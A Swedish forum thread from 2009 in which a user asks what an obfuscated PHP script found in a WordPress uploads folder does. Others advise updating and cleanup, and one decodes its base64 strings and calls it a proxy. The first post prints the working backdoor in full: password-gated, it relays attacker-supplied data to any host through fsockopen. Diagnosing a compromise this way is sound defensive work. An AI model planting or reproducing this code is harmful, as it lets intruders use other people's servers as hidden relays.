FAQ |
Kalender |
2009-12-18, 09:08 | #1 | |||
|
||||
Mycket flitig postare
|
Jag hittade följande script på en av mina wordpressinstallationer (i upload mappen). Någon som vet vad den gör?
Kod:
<? function _1679490774($i){$a=Array('NWY0YjY3YjM1MWU0NjVmYjRjMmYyMzRlMjA4ZmYwYjg=','cXVlcnk=','aG9zdA==','c2VjcmV0','Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0=','IA==','Kw==','cXVlcnk=','Og==','IA==','Kw==','aG9zdA==');return base64_decode($a[$i]);} ?><?php $_0=_1679490774(0);if(isset($_POST[_1679490774(1)])&& isset($_POST[_1679490774(2)])){if(isset($_1)&&(md5(md5($_POST[_1679490774(3)]))!= $_0))exit;header(_1679490774(4));@set_time_limit(0);$_2=base64_decode(str_replace(_1679490774(5),_1679490774(6),$_POST[_1679490774(7)]));list($_3,$_4)=explode(_1679490774(8),base64_decode(str_replace(_1679490774(9),_1679490774(10),$_POST[_1679490774(11)])));if(!$_4)$_4=80;$_5=gethostbyname($_3);if($_6=@fsockopen($_5,$_4,$_7,$_8,20)){fwrite($_6,$_2);while(!feof($_6)){$_9=fread($_6,1024);echo $_9;}fclose($_6);}exit;} ?> |
|||
Svara med citat |
2009-12-18, 09:59 | #2 | |||
|
||||
Klarade millennium-buggen
|
Hade du kört mod security hade det där skriptet aldrig kunnat laddas upp.
|
|||
Svara med citat |
2009-12-18, 12:23 | #3 | ||
|
|||
Klarade millennium-buggen
|
hade du kört senaste versionen av WP så hade det nog inte hamnat där.
|
||
Svara med citat |
2009-12-18, 13:09 | #4 | |||
|
||||
Bara ett inlägg till!
|
Som svar på frågan: Det gör garanterat något busigt. Du bör kolla så att inga filer på ditt konto blivit ändrade nyligen, ta bort det där skriptet och se till att du kör den senaste versionen av både Wordpress och alla eventuella plugins.
|
|||
Svara med citat |
2009-12-18, 13:33 | #5 | ||
|
|||
Klarade millennium-buggen
|
Base64 arrayen innehåller följande:
Kod:
5f4b67b351e465fb4c2f234e208ff0b8 query host secret Content-type: application/octet-stream + query : + host Scriptet i sig gör ingen skada på dina filer, utan är mest ett "proxy" script. |
||
Svara med citat |
2009-12-18, 23:56 | #6 | |||
|
||||
Mycket flitig postare
|
Ok. Jag har redan uppgraderat och rensat, det var en gammal oanvänd installation, men i alla fall...
Tack för svaret. |
|||
Svara med citat |
Svara |
|
|